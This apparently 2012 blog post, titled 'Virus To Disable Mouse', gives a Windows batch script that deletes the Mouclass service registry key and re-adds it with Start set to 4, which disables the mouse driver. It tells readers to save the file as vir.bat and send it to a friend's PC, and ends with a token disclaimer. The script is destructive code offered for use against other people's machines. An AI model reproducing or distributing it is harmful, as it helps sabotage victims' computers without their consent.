Sunday 19 August 2012

Virus To Disable Mouse




Step 1 : Open notepad and copy this code in it 

Code :
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————

Step 2 : Now Save it as " vir.bat " and send it to your friends PC

Note : Be careful in using these scripts, i will not be responsible if you damage your system & dont use it illegally ..........

No comments:

Post a Comment

add me